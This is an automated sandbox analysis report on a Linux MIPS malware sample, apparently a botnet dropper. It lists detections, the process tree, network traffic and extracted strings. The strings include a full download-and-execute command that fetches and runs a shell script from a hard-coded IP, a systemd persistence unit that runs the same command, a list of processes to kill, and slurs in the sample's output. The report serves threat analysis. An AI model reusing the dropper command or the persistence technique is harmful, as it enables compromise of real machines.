Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
mpsl.elf

Overview

General Information

Sample name:mpsl.elf
Analysis ID:1585038
MD5:aa498d8b14dff7783d7f01d4d4c9f8e4
SHA1:94f84785a89ce84f4977178eaf5524c05831832e
SHA256:22633b8d957952975d5680571716b1c2e5b392516a7218a51f3221af2c71d33a
Tags:elfuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sample deletes itself
Sample tries to kill multiple processes (SIGKILL)
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1585038
Start date and time:2025-01-07 01:08:25 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 6s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mpsl.elf
Detection:MAL
Classification:mal64.spre.evad.linELF@0/4@84/0
  • VT rate limit hit for: tcpdown.suF
Command:/tmp/mpsl.elf
PID:5502
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
made you my bitch
Standard Error:
  • system is lnxubuntu20
  • mpsl.elf (PID: 5502, Parent: 5428, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mpsl.elf
    • mpsl.elf New Fork (PID: 5504, Parent: 5502)
      • mpsl.elf New Fork (PID: 5506, Parent: 5504)
      • mpsl.elf New Fork (PID: 5507, Parent: 5504)
        • mpsl.elf New Fork (PID: 5512, Parent: 5507)
      • mpsl.elf New Fork (PID: 5510, Parent: 5504)
      • sh (PID: 5510, Parent: 5504, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
        • sh New Fork (PID: 5514, Parent: 5510)
        • systemctl (PID: 5514, Parent: 5510, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • mpsl.elf New Fork (PID: 5518, Parent: 5504)
      • sh (PID: 5518, Parent: 5504, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable startup_command.service"
        • sh New Fork (PID: 5520, Parent: 5518)
        • systemctl (PID: 5520, Parent: 5518, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable startup_command.service
  • systemd New Fork (PID: 5516, Parent: 5515)
  • snapd-env-generator (PID: 5516, Parent: 5515, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5524, Parent: 5523)
  • snapd-env-generator (PID: 5524, Parent: 5523, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • sh (PID: 5545, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
  • gsd-rfkill (PID: 5545, Parent: 1588, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill
  • systemd New Fork (PID: 5550, Parent: 1)
  • systemd-hostnamed (PID: 5550, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed
  • gdm3 New Fork (PID: 5681, Parent: 1400)
  • Default (PID: 5681, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5682, Parent: 1400)
  • Default (PID: 5682, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5687, Parent: 1)
  • systemd-user-runtime-dir (PID: 5687, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: mpsl.elfAvira: detected
Source: mpsl.elfVirustotal: Detection: 53%Perma Link
Source: mpsl.elfReversingLabs: Detection: 52%
Source: mpsl.elfString: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe
Source: mpsl.elfString: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: mpsl.elfString: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
Source: startup_command.service.13.drString: ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh (null)
Source: global trafficTCP traffic: 192.168.2.13:40146 -> 45.200.149.249:2601
Source: global trafficTCP traffic: 192.168.2.13:45540 -> 45.200.149.95:2601
Source: global trafficTCP traffic: 192.168.2.13:53064 -> 23.94.37.42:2601
Source: global trafficTCP traffic: 192.168.2.13:55136 -> 23.94.242.130:2601
Source: global trafficTCP traffic: 192.168.2.13:50408 -> 104.168.33.8:2601
Source: /tmp/mpsl.elf (PID: 5502)Socket: 127.0.0.1:39123Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.suF
Source: startup_command.service.13.drString found in binary or memory: http://154.216.20.138/auto.sh
Source: mpsl.elf, startup_command.service.13.drString found in binary or memory: http://154.216.20.138/auto.sh;

System Summary

barindex
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 727, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 914, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 917, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 1805, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 1884, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 2961, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 5506, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 5512, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 5545, result: successfulJump to behavior
Source: Initial sampleString containing 'busybox' found: busybox
Source: Initial sampleString containing 'busybox' found: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe
Source: Initial sampleString containing 'busybox' found: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: Initial sampleString containing 'busybox' found: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 727, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 914, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 917, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 1805, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 1884, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 2961, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 5506, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 5512, result: successfulJump to behavior
Source: /tmp/mpsl.elf (PID: 5507)SIGKILL sent: pid: 5545, result: successfulJump to behavior
Source: classification engineClassification label: mal64.spre.evad.linELF@0/4@84/0
Source: /usr/libexec/gsd-rfkill (PID: 5545)Directory: <invalid fd (9)>/..Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 5545)Directory: <invalid fd (8)>/..Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 5550)Directory: <invalid fd (10)>/..Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/236/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/237/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/238/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/239/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/3632/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/10/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/11/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/12/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/13/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/14/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/15/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/16/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/17/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/18/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/19/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/240/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/120/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/241/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/121/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/242/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/122/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/243/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/2/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/123/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/244/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/3/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/124/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/245/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/125/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/4/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/246/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/126/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/5/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/247/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/127/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/6/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/248/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/128/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/7/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/249/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/129/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/8/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/9/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/803/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/20/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/21/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/22/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/23/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/24/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/25/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/26/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/27/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/28/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/29/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/3420/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/1482/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/490/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/1480/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/250/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/371/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/130/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/251/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/131/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/252/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/132/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/253/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/254/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/1238/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/134/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/255/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/256/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/257/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/378/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/3413/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/258/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/259/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/1475/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/936/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/30/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/816/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)File opened: /proc/35/cmdlineJump to behavior
Source: /tmp/mpsl.elf (PID: 5510)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/mpsl.elf (PID: 5518)Shell command executed: sh -c "systemctl enable startup_command.service"Jump to behavior
Source: /bin/sh (PID: 5514)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 5520)Systemctl executable: /usr/bin/systemctl -> systemctl enable startup_command.serviceJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/mpsl.elf (PID: 5502)File: /tmp/mpsl.elfJump to behavior
Source: /tmp/mpsl.elf (PID: 5502)Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 5550)Queries kernel information via 'uname': Jump to behavior
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: Uu-binfmt/mipsel/var/lib/vmware
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: u-binfmt/mipsel/var/lib/vmware/VGAuth/aliasStore
Source: mpsl.elf, 5502.1.000055c421f57000.000055c421ffe000.rw-.sdmp, mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp, mpsl.elf, 5512.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
Source: mpsl.elf, 5502.1.00007fff52b59000.00007fff52b7a000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.Nyhh0c\
Source: mpsl.elf, 5512.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: !/sbin/irqbalance!/sbin/mount.vmhgfs1
Source: mpsl.elf, 5506.1.00007f66a446c000.00007f66a4476000.rw-.sdmpBinary or memory string: vmwareD
Source: mpsl.elf, 5502.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp, mpsl.elf, 5506.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp, mpsl.elf, 5512.1.00007fff52b59000.00007fff52b7a000.rw-.sdmpBinary or memory string: /qemu-open.XXXXX
Source: mpsl.elf, 5502.1.00007fff52b59000.00007fff52b7a000.rw-.sdmpBinary or memory string: /tmp/qemu-open.Nyhh0c
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: /var/lib/vmware
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: /tmp/vmware-root_727-4290690966
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: !/var/lib/vmware/VGAuthQ
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: Uu-binfmt/mipsel/var/lib/vmware/VGAuth/aliasStore!/var/lib/PackageKitQ
Source: mpsl.elf, 5502.1.000055c421f57000.000055c421ffe000.rw-.sdmp, mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp, mpsl.elf, 5512.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: U/mipsel/1/tmp/vmware-root_727-42906909660!/proc/5486/cmdline!`
Source: mpsl.elf, 5502.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp, mpsl.elf, 5506.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp, mpsl.elf, 5512.1.00007fff52b59000.00007fff52b7a000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/mpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mpsl.elf
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: mpsl.elf, 5506.1.00007f66a446c000.00007f66a4476000.rw-.sdmpBinary or memory string: /var/lib/boltd8/var/lib/vmware<
Source: mpsl.elf, 5506.1.00007f66a445b000.00007f66a446c000.rw-.sdmpBinary or memory string: FP/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf$/tmp/vmware-root_727-4290690966P/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-KWckKg4/tmp/hsperfdata_root
Source: mpsl.elf, 5512.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: /sbin/mount.vmhgfs
Source: mpsl.elf, 5506.1.00007f66a446c000.00007f66a4476000.rw-.sdmpBinary or memory string: vmware
Source: mpsl.elf, 5506.1.00007f66a446c000.00007f66a4476000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth4/var/lib/NetworkManagerx
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: Uu-binfmt/mipsel/var/lib/vmware/VGAuth1/var/lib/vmware/VGAuth/aliasStoreQ0
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: u-binfmt/mipsel/var/lib/vmware/VGAuth
Source: mpsl.elf, 5506.1.00007f66a446c000.00007f66a4476000.rw-.sdmpBinary or memory string: F(/var/lib/vmware/VGAuth/aliasStoreF
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: u-binfmt/mipsel/var/lib/vmware
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmpBinary or memory string: !/var/lib/vmwareQP
Source: mpsl.elf, 5502.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp, mpsl.elf, 5506.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp, mpsl.elf, 5512.1.00007fff52b59000.00007fff52b7a000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid AccountsWindows Management Instrumentation1
Systemd Service
1
Systemd Service
1
Hidden Files and Directories
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization Scripts1
File Deletion
